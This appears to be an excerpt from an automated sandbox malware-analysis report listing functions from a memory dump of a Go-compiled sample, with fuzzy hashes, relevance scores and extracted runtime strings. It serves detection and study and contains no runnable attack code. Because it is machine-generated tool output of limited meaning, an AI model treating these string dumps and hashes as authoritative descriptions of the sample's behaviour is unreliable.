Opcode Fuzzy Hash: b860d768e0b3f449dd54978daed987d03cbf5153f87c610834599d6cc58b4c1a
Instruction Fuzzy Hash: F19194765A4AC084EF7E8B95D84832B77A1E39DB88F54C416E70943FA6EB78C884C701

Function 000002EBF9B98800 Relevance: 10.2, Strings: 8, Instructions: 167
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

: missing method GC assist markingbad TinySizeClassentersyscallblockg already scannedgp.waiting != nilkey align too biglocked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]notetsleepg on g0runtime.newosprocruntime/internal/scano, xrefs: 000002EBF9B98AF7
is not pointerBAD RANKDOWNGRD, xrefs: 000002EBF9B98ABF
(types from different packages)WSAGetOverlappedResult not found" not supported for cpu option "invalid limiter event type foundremovespecial on invalid pointerruntime.semasleep wait_abandonedruntime: failed to release pagesruntime: fixalloc size too largerunt, xrefs: 000002EBF9B98A35
is on %02x%q%q%s%s%s:/%x	><'\''(?:)("'/) = );+Inf-Inf...:.3dm.INF.Inf.NAN.NaN.aab.aam.aas.abc.ace.afl.aif.aim.aip.alz.ani.aos.apk.aps.arc.arj.art.asf.asm.asp.asx.avi.avs.bat.bin.bmp.boo.boz.bsh.bz2.c++.cab.cat.cco.cdf.cer.cha.cmd.com.cpp.cpt.crl, xrefs: 000002EBF9B98912
(types from different scopes)GODEBUG: unknown cpu feature "assignment to entry in nil mapcheckdead: inconsistent countsfailed to get system page sizefreedefer with d._panic != nilinvalid pointer found on stacknotetsleep - waitm out of syncrunqputslow: queue i, xrefs: 000002EBF9B98A54
is nil, not , not pointerGC sweep waitbad map statedalTLDpSugct?double unlockfilter methodinvalid UTF-8load64 failedmin too largenil stackbaseout of memoryprofMemActiveprofMemFuturestart tracingtraceStackTabvalue method winpty/amd64/xadd64 failedxchg64 failed, xrefs: 000002EBF9B98B64
, not , val --%s-07:00.bcpio.class.deepv.htmls.latex.local.mhtml.movie.onion.pages.pfunk.pprof.shtml.ustar.vcard.wmlsc.x-png1.12.0390625<-chan</a>.<pre>AElig;AacuteAcceptAcirc;AgraveAlpha;Amacr;AnswerAogon;ArabicAring;AtildeAugustBasic BitBltBrahmiBreve;CA, xrefs: 000002EBF9B9893D
interface conversion: kernel32.dll not foundminpc or maxpc invalidnon-positive dimensionoldoverflow is not nilruntime.main not on m0s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2trace reader (bloc, xrefs: 000002EBF9B988DD, 000002EBF9B98A94, 000002EBF9B98B79

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: (types from different packages)WSAGetOverlappedResult not found" not supported for cpu option "invalid limiter event type foundremovespecial on invalid pointerruntime.semasleep wait_abandonedruntime: failed to release pagesruntime: fixalloc size too largerunt$ (types from different scopes)GODEBUG: unknown cpu feature "assignment to entry in nil mapcheckdead: inconsistent countsfailed to get system page sizefreedefer with d._panic != nilinvalid pointer found on stacknotetsleep - waitm out of syncrunqputslow: queue i$ is on %02x%q%q%s%s%s:/%x	><'\''(?:)("'/) = );+Inf-Inf...:.3dm.INF.Inf.NAN.NaN.aab.aam.aas.abc.ace.afl.aif.aim.aip.alz.ani.aos.apk.aps.arc.arj.art.asf.asm.asp.asx.avi.avs.bat.bin.bmp.boo.boz.bsh.bz2.c++.cab.cat.cco.cdf.cer.cha.cmd.com.cpp.cpt.crl$ is nil, not , not pointerGC sweep waitbad map statedalTLDpSugct?double unlockfilter methodinvalid UTF-8load64 failedmin too largenil stackbaseout of memoryprofMemActiveprofMemFuturestart tracingtraceStackTabvalue method winpty/amd64/xadd64 failedxchg64 failed$ is not pointerBAD RANKDOWNGRD$, not , val --%s-07:00.bcpio.class.deepv.htmls.latex.local.mhtml.movie.onion.pages.pfunk.pprof.shtml.ustar.vcard.wmlsc.x-png1.12.0390625<-chan</a>.<pre>AElig;AacuteAcceptAcirc;AgraveAlpha;Amacr;AnswerAogon;ArabicAring;AtildeAugustBasic BitBltBrahmiBreve;CA$: missing method GC assist markingbad TinySizeClassentersyscallblockg already scannedgp.waiting != nilkey align too biglocked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]notetsleepg on g0runtime.newosprocruntime/internal/scano$interface conversion: kernel32.dll not foundminpc or maxpc invalidnon-positive dimensionoldoverflow is not nilruntime.main not on m0s.freeindex > s.nelemsscanstack - bad statussend on closed channelspan has no free spacestack not a power of 2trace reader (bloc
API String ID: 0-2989815845
Opcode ID: 1ab600e0860e343834a5160482f63b84b281e1fce47365ebc462477369cf258d
Instruction ID: e721fc746b4db1e0c7663ae5381bc8b7c6576806a1f38d6f879a2b4c58ffde28
Opcode Fuzzy Hash: 1ab600e0860e343834a5160482f63b84b281e1fce47365ebc462477369cf258d
Instruction Fuzzy Hash: B591E272648BC495EB659B55F84439BB3A5F389B80F548026EBCC47B6AEF78C059CB00

Function 000002EBF9B915C0 Relevance: 9.2, Strings: 7, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

avx2basebcy;betabfr;bindbitsbmi1bmi2bne;boolbot;bullcallcap cap;cas1cas2cas3cas4cas5cas6casecentcfr;chanchi;cir;circcitecolsconfcongconncopycpu-cup;cx16dArrdarrdatadatedcy;deg;dfr;dialdie;div;dot;dropeEpPechoecy;efr;egs;ell;els;elseemspeng;enspermseta;etageth;, xrefs: 000002EBF9B91AB5, 000002EBF9B91AD2
ermseta;etageth;eumleurofailfcy;ffr;filefnofformfreefromftpsfuncgEl;gap;gcy;gel;geq;ges;gfr;ggg;glE;gla;glj;gnE;gne;gotogziphArrharrheaphfr;highhosthourhrefhtmlhttpicmpiconicy;idleiff;ifr;igmpinfoint8int;iotaisinitabiumljcy;jfr;jneqjsonkcy;kfr;kindlArrlEg;lang, xrefs: 000002EBF9B91628
popcntposterpound;prcue;prime;printfprnap;prsim;publicquest;rAarr;rBarr;radic;rangd;range;raquo;rarrb;rarrc;rarrw;ratio;rbarr;rbbrk;rbrke;rceil;rdquo;rdrandrdseedrdtscpreadU4readatreals;removerenamereturnrfloorrhard;rharu;rlarr;rlhar;rnmid;roang;roarr;robrk;ro, xrefs: 000002EBF9B917F1, 000002EBF9B9180F
sse3stepsub;subesum;sup1sup2sup3sup;supesynctRNStau;tcy;texttfr;top;truetypeuArruarrucy;udp4ufr;uintuml;unixuseduumlvaryvcy;vee;vfr;voidwfr;withwrapxfr;xn--yamlycy;yen;yfr;yumlzcy;zetazfr;zwj;zwnj -%s (at and id=" not %.2fG%.2fK%.2fM%.2fh%.2fm%.2fs%q:%q%s %, xrefs: 000002EBF9B91849, 000002EBF9B91866
adxaesaf;agealtampandangap;apraugavxbincapcgochicmdcolcpucupdd;decdegdirdnsee;eg;el;endetaethfebfinfmaforfriftpgE;ge;gg;gl;gt;ic;ii;imgin;iniintit;janjeqjgejgtjlejltjuljunkcpkeylE;le;lenlg;ll;lowlozlrmlt;mapmarmaxmayminmonmp;mu;nanne;negnewni;nilnotnovnu;oS;ob, xrefs: 000002EBF9B915ED
sse41sse42ssse3star;startstdinstorestylesub xsubE;sube;succ;sudogsung;sup1;sup2;sup3;supE;supe;svqxXsweepszligtbrk;tdot;text/thetathornthrowtildetimestint;titletls: toea;topf;tosa;tracetradetrie;tscr;tscy;uArr;uHar;uarr;ucircuint8uopf;upsi;upsihusageuscr;utf-8, xrefs: 000002EBF9B9189F, 000002EBF9B918BC
rdtscpreadU4readatreals;removerenamereturnrfloorrhard;rharu;rlarr;rlhar;rnmid;roang;roarr;robrk;ropar;rrarr;rsaquorsquo;rtrie;rtrif;rune1 sNaPpYsbquo;scalarscaronsccue;scirc;scnap;scopedscriptscsim;sdotb;sdote;seArr;searr;secondselectsendtoserversetmn;sharp;si, xrefs: 000002EBF9B91667

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: adxaesaf;agealtampandangap;apraugavxbincapcgochicmdcolcpucupdd;decdegdirdnsee;eg;el;endetaethfebfinfmaforfriftpgE;ge;gg;gl;gt;ic;ii;imgin;iniintit;janjeqjgejgtjlejltjuljunkcpkeylE;le;lenlg;ll;lowlozlrmlt;mapmarmaxmayminmonmp;mu;nanne;negnewni;nilnotnovnu;oS;ob$avx2basebcy;betabfr;bindbitsbmi1bmi2bne;boolbot;bullcallcap cap;cas1cas2cas3cas4cas5cas6casecentcfr;chanchi;cir;circcitecolsconfcongconncopycpu-cup;cx16dArrdarrdatadatedcy;deg;dfr;dialdie;div;dot;dropeEpPechoecy;efr;egs;ell;els;elseemspeng;enspermseta;etageth;$ermseta;etageth;eumleurofailfcy;ffr;filefnofformfreefromftpsfuncgEl;gap;gcy;gel;geq;ges;gfr;ggg;glE;gla;glj;gnE;gne;gotogziphArrharrheaphfr;highhosthourhrefhtmlhttpicmpiconicy;idleiff;ifr;igmpinfoint8int;iotaisinitabiumljcy;jfr;jneqjsonkcy;kfr;kindlArrlEg;lang$popcntposterpound;prcue;prime;printfprnap;prsim;publicquest;rAarr;rBarr;radic;rangd;range;raquo;rarrb;rarrc;rarrw;ratio;rbarr;rbbrk;rbrke;rceil;rdquo;rdrandrdseedrdtscpreadU4readatreals;removerenamereturnrfloorrhard;rharu;rlarr;rlhar;rnmid;roang;roarr;robrk;ro$rdtscpreadU4readatreals;removerenamereturnrfloorrhard;rharu;rlarr;rlhar;rnmid;roang;roarr;robrk;ropar;rrarr;rsaquorsquo;rtrie;rtrif;rune1 sNaPpYsbquo;scalarscaronsccue;scirc;scnap;scopedscriptscsim;sdotb;sdote;seArr;searr;secondselectsendtoserversetmn;sharp;si$sse3stepsub;subesum;sup1sup2sup3sup;supesynctRNStau;tcy;texttfr;top;truetypeuArruarrucy;udp4ufr;uintuml;unixuseduumlvaryvcy;vee;vfr;voidwfr;withwrapxfr;xn--yamlycy;yen;yfr;yumlzcy;zetazfr;zwj;zwnj -%s (at and id=" not %.2fG%.2fK%.2fM%.2fh%.2fm%.2fs%q:%q%s %$sse41sse42ssse3star;startstdinstorestylesub xsubE;sube;succ;sudogsung;sup1;sup2;sup3;supE;supe;svqxXsweepszligtbrk;tdot;text/thetathornthrowtildetimestint;titletls: toea;topf;tosa;tracetradetrie;tscr;tscy;uArr;uHar;uarr;ucircuint8uopf;upsi;upsihusageuscr;utf-8
API String ID: 0-3923990303
Opcode ID: 399639f1e24eeaa0fc015bb66df24062eff2557931bc4ebde9a84167333544e1
Instruction ID: e38f35d1a4bc1251637519f7550f7d49feae8bcc4053408a6409b1945a174d99
Opcode Fuzzy Hash: 399639f1e24eeaa0fc015bb66df24062eff2557931bc4ebde9a84167333544e1
Instruction Fuzzy Hash: 2932B93A290AC4D5EB26DF94FC5C38B77A1F746B84F955512EA488BB76EB38C419C300

Function 000002EBF9B91060 Relevance: 9.1, Strings: 7, Instructions: 306
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

GODEBUG: can not enable "PLTE, color type mismatch_cgo_thread_start missingallgadd: bad status Gidlearena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timermissing st, xrefs: 000002EBF9B9132C
GODEBUG: no value specified for "concurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack spanjsCtxRegexpjsCtxDivOpjsCtxUnknownmin must be a non-zero power of 2misrounded allocation in sysAllocruntime: failed to decommit p, xrefs: 000002EBF9B91288
GODEBUG: unknown cpu feature "assignment to entry in nil mapcheckdead: inconsistent countsfailed to get system page sizefreedefer with d._panic != nilinvalid pointer found on stacknotetsleep - waitm out of syncrunqputslow: queue is not fullunsafe.Slice: len ou, xrefs: 000002EBF9B914B5
", missing CPU supportchan receive (nil chan)close of closed channelfailed to verify entityfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]invalid escape sequenceleft over markroot jobsmakechan: bad alignmentmissing, xrefs: 000002EBF9B9134C
cpu., xrefs: 000002EBF9B910F3
" not supported for cpu option "invalid limiter event type foundremovespecial on invalid pointerruntime.semasleep wait_abandonedruntime: failed to release pagesruntime: fixalloc size too largeruntime: mcall function returnedruntime: stack split at bad timerunt, xrefs: 000002EBF9B91234
GODEBUG: value ", xrefs: 000002EBF9B91211

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: " not supported for cpu option "invalid limiter event type foundremovespecial on invalid pointerruntime.semasleep wait_abandonedruntime: failed to release pagesruntime: fixalloc size too largeruntime: mcall function returnedruntime: stack split at bad timerunt$", missing CPU supportchan receive (nil chan)close of closed channelfailed to verify entityfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]invalid escape sequenceleft over markroot jobsmakechan: bad alignmentmissing$GODEBUG: can not enable "PLTE, color type mismatch_cgo_thread_start missingallgadd: bad status Gidlearena already initializedbad status in shrinkstackbad system huge page sizechansend: spurious wakeupcheckdead: no m for timercheckdead: no p for timermissing st$GODEBUG: no value specified for "concurrent map read and map writefindrunnable: negative nmspinningfreeing stack not in a stack spanjsCtxRegexpjsCtxDivOpjsCtxUnknownmin must be a non-zero power of 2misrounded allocation in sysAllocruntime: failed to decommit p$GODEBUG: unknown cpu feature "assignment to entry in nil mapcheckdead: inconsistent countsfailed to get system page sizefreedefer with d._panic != nilinvalid pointer found on stacknotetsleep - waitm out of syncrunqputslow: queue is not fullunsafe.Slice: len ou$GODEBUG: value "$cpu.
API String ID: 0-786308342
Opcode ID: be719dd5124c0cfdeaa15eca05ec1978ef1fd0dcbf339f4409c6a86a4ea53c7b
Instruction ID: 894e6fc2ddcf089ae818719f7e22900b36f3756a91615b84209d0c7a46517d7f
Opcode Fuzzy Hash: be719dd5124c0cfdeaa15eca05ec1978ef1fd0dcbf339f4409c6a86a4ea53c7b
Instruction Fuzzy Hash: 36D1B2226986C4C1EB269BE5E8583AFAB65F38EBD0F544111FA9D07FA7DB38C4409710

Function 000002EBF9B993A0 Relevance: 8.9, Strings: 7, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pointerBAD RANKDOWNGRD, xrefs: 000002EBF9B99641
panicwrap: no ( in panicwrap: no ) in runtime: preempt g0semaRoot rotateLeftstopm holding lockssysMemStat overflowtoo much pixel dataunexpected g statusunknown wait reasonwinmm.dll not foundbad system page sizebad use of bucket.bpbad use of bucket.mpchan send , xrefs: 000002EBF9B996E2
panicwrap: unexpected string after type name: released less than one physical page of memoryruntime: name offset base pointer out of rangeruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangeslice bounds out of range [:%x, xrefs: 000002EBF9B99508
), xrefs: 000002EBF9B994CE
panicwrap: unexpected string after package name: runtime.reflect_makemap: unsupported map key typeruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left ou, xrefs: 000002EBF9B99438
panicwrap: no ) in runtime: preempt g0semaRoot rotateLeftstopm holding lockssysMemStat overflowtoo much pixel dataunexpected g statusunknown wait reasonwinmm.dll not foundbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of , xrefs: 000002EBF9B9969F
value method winpty/amd64/xadd64 failedxchg64 failed to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overfl, xrefs: 000002EBF9B99573

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: pointerBAD RANKDOWNGRD$)$panicwrap: no ( in panicwrap: no ) in runtime: preempt g0semaRoot rotateLeftstopm holding lockssysMemStat overflowtoo much pixel dataunexpected g statusunknown wait reasonwinmm.dll not foundbad system page sizebad use of bucket.bpbad use of bucket.mpchan send $panicwrap: no ) in runtime: preempt g0semaRoot rotateLeftstopm holding lockssysMemStat overflowtoo much pixel dataunexpected g statusunknown wait reasonwinmm.dll not foundbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of $panicwrap: unexpected string after package name: runtime.reflect_makemap: unsupported map key typeruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ysweeper left ou$panicwrap: unexpected string after type name: released less than one physical page of memoryruntime: name offset base pointer out of rangeruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangeslice bounds out of range [:%x$value method winpty/amd64/xadd64 failedxchg64 failed to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overfl
API String ID: 0-76895983
Opcode ID: e2b03397c61c6924ba2ed4a4772a291219c5539e80f4f267db2734702f53a144
Instruction ID: 641d4b5566ce2a01153b3e8b1bb755a1f0462ce130fb62e12a1b9726f432b82d
Opcode Fuzzy Hash: e2b03397c61c6924ba2ed4a4772a291219c5539e80f4f267db2734702f53a144
Instruction Fuzzy Hash: 50818C32258BC185DB66DB91F84939BB3A1F789B80F448126EA9D47F9AEF3CC145C700

Function 000002EBF9BBF920 Relevance: 8.8, Strings: 7, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

rof.dll, xrefs: 000002EBF9BBF955
gisterSu, xrefs: 000002EBF9BBF98E
ication, xrefs: 000002EBF9BBF9BB
spendRes, xrefs: 000002EBF9BBF99D
powrprof, xrefs: 000002EBF9BBF946
PowerReg, xrefs: 000002EBF9BBF97F
umeNotif, xrefs: 000002EBF9BBF9AC

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
String ID: PowerReg$gisterSu$ication$powrprof$rof.dll$spendRes$umeNotif
API String ID: 0-941992356
Opcode ID: e5bcf5414a9f5cc902cfa0811e49b0ae7c57cf0fc27f3b0d6a705dddb7ba6684
Instruction ID: 61dd0d6c3b8716f2b8c66e96a72fdf9225b5e7d08d38cd4630e6040ce275d7c7
Opcode Fuzzy Hash: e5bcf5414a9f5cc902cfa0811e49b0ae7c57cf0fc27f3b0d6a705dddb7ba6684
Instruction Fuzzy Hash: 3F3104B2248B80C5E625DB51F44439AB7A5F7897C4F988025ABDC47BAADF38C115CB40

Function 000002EBF9BA78FC Relevance: 7.6, Strings: 6, Instructions: 113COMMON

Download Yara Rule

Strings

runtime.SetFinalizer: second argument is runtime: blocked read on closing polldescruntime: typeBitsBulkBarrier without typestopTheWorld: not stopped (stopwait != 0)acquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callnon-empty ma, xrefs: 000002EBF9BA7CAC
to finalizer GC (dedicated)GC assist waitGC worker initbad allocCountbad restart PCbad span statefinalizer waitkey size wrongnil elem type!no module datanot a PNG fileread mem statssemaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.WaituserAren, xrefs: 000002EBF9BA7BA1, 000002EBF9BA7BF8, 000002EBF9BA7C62
runtime.SetFinalizer: pointer not at beginning of allocated blockuser arena chunk size is not a mutliple of the physical page sizeToNearestEvenToNearestAwayToZeroAwayFromZeroToNegativeInfToPositiveInfcannot convert slice with length %y to array or pointer to a, xrefs: 000002EBF9BA7CBD
runtime.SetFinalizer: cannot pass runtime: g is running but p is notschedule: spinning with local workslice bounds out of range [%x:%y:]slice bounds out of range [:%x:%y]trace: non-empty full trace bufferattempt to clear non-empty span setfindrunnable: netpoll, xrefs: 000002EBF9BA7BB6, 000002EBF9BA7C0D, 000002EBF9BA7C77
because dotdotdotGC worker (active)bad lfnode addressbad manualFreeListchunk out of ordercleantimers: bad pcompression methoddimension overflowelem align too bigforEachP: not donegarbage collectionindex out of rangeruntime.semacreateruntime.semawakeupstopping, xrefs: 000002EBF9BA7C3C
, not a function0123456789ABCDEF0123456789abcdefGC scavenge waitGC worker (idle)GODEBUG: value ", xrefs: 000002EBF9BA7C9D

Memory Dump Source

Source File: 00000000.00000002.4572444295.000002EBF9B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002EBF9B90000, based on PE: true

Associated: 00000000.00000002.4572444295.000002EBFA590000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA7FC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA869000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA898000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA915000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D4000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9D8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFA9DE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE2C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE33000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE5A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4572444295.000002EBFAE61000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ebf9b90000_O16AWEA5iQ.jbxd

Similarity

API ID:
